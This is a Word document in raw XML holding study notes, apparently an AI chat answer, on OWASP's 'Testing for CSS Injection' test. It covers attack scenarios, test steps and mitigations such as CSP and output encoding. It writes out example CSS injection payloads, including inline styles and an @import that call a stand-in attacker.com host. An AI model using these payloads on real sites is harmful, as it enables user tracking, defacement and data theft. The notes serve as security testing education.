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F950" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">Perfect </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👌</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> Let’s build </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>precise WSTG notes for “Testing for CSS Injection” (WSTG-CLNT-05)</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA6E26" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:pict w14:anchorId="41376DC3">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E60537C" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing for CSS Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506FB847" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD5BEC" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">To check if </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user-supplied input</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> is injected into </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSS stylesheets or inline styles</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> without proper sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC6EA9" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">CSS Injection may not always give </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t>, but it can lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE21E3" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UI manipulation / defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96C8CD" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sensitive data exfiltration (CSS-based attacks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A210F4" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing / Clickjacking support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32712820" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">In some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>cases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stealing secrets via CSS attribute selectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D120A" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:pict w14:anchorId="067A9D26">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849EF3D" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BB654" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Style Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E6CB7" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t>&lt;style&gt;body {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>background:red;}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t>/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD64CC" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Malicious Inline Style Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370C86B" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t>&lt;div style="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>color:blue</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t>; background:url(//attacker.com/track.png)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C57057" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exfiltration via CSS Selectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19736750" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t>Advanced attacks: guessing content (e.g., CSRF tokens, usernames) using CSS attribute selectors and loading external resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F3A41" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing/Overlay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297AD9C8" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t>Hiding login forms and injecting fake ones via CSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901A565" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:pict w14:anchorId="28EB5CF9">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33086D" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> How to Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D73DA6" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inject CSS in Input Fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364F37A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t>&lt;style&gt;h1{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>color:red</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t>}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD77EB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t>"&gt;&lt;style&gt;body{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>display:none</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t>}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E6216" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inline Style Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15DF88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lastRenderedPageBreak/>
        <w:t>Test if user input is reflected in style= attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D0958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t>Example payload: " style="background:url(//attacker.com/poc)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC63DE" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check for External CSS Loads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FE889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t>Try forcing CSS load from attacker domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E287BAE" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>@import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> url(//attacker.com/evil.css</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="321D869F" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detect Data Exfiltration Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C25562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t>Use CSS attribute selectors to infer hidden values (advanced, mostly PoC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07525F5B" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E20D5DC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t>Burp/ZAP → inject payloads into form inputs, query params, headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB954C7" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t>Browser DevTools → inspect DOM for injected CSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF639DF" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:pict w14:anchorId="685A8FB3">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D170937" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9375B" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Never allow raw user input</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> in style contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D76A1" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>output encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> for CSS (&lt;, &gt;, {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00031606">
        <w:t>, }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> should be escaped).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CA66D" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSP (Content Security Policy)</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> → block inline styles + restrict external CSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A97651" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">Sanitize with libraries (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t>) when dynamic styles are needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012CEFA6" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">Prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server-side controlled styles</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> instead of user-controlled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F26E46" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:pict w14:anchorId="7547BEA9">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D4B65" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Takeaway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:br/>
        <w:t xml:space="preserve">CSS Injection alters page appearance and can aid </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phishing, data exfiltration, and clickjacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve">. While often underestimated compared to XSS, it’s still a </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client-side injection risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> that must be mitigated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC25079" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:pict w14:anchorId="5C6A442A">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C960E0C" w14:textId="77777777" w:rsidR="00031606" w:rsidRPr="00031606" w:rsidRDefault="00031606" w:rsidP="00031606">
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> Do you want me to also add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real-world CSS exfiltration attack example</w:t>
      </w:r>
      <w:r w:rsidRPr="00031606">
        <w:t xml:space="preserve"> (like extracting CSRF tokens via CSS selectors) so you can see how dangerous this gets beyond just “making text red”?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A17283" w14:textId="77777777" w:rsidR="0000111E" w:rsidRPr="00031606" w:rsidRDefault="0000111E" w:rsidP="00031606"/>
    <w:sectPr w:rsidR="0000111E" w:rsidRPr="0003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B585E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5CE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E40BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EFA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F583E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D0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25A1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D54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93492">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="990865842">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="412049333">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="137739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34"/>
    <w:rsid w:val="0000111E"/>
    <w:rsid w:val="00031606"/>
    <w:rsid w:val="005E4A76"/>
    <w:rsid w:val="0072345A"/>
    <w:rsid w:val="00984DF0"/>
    <w:rsid w:val="00B24534"/>
    <w:rsid w:val="00CB68ED"/>
    <w:rsid w:val="00F332BF"/>
    <w:rsid w:val="00F56A55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EEC59-4225-42C8-A6BE-32D3C799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3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3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3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3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3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3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2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3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3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2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3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2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3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24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2025-08-25T13:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-25T13:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>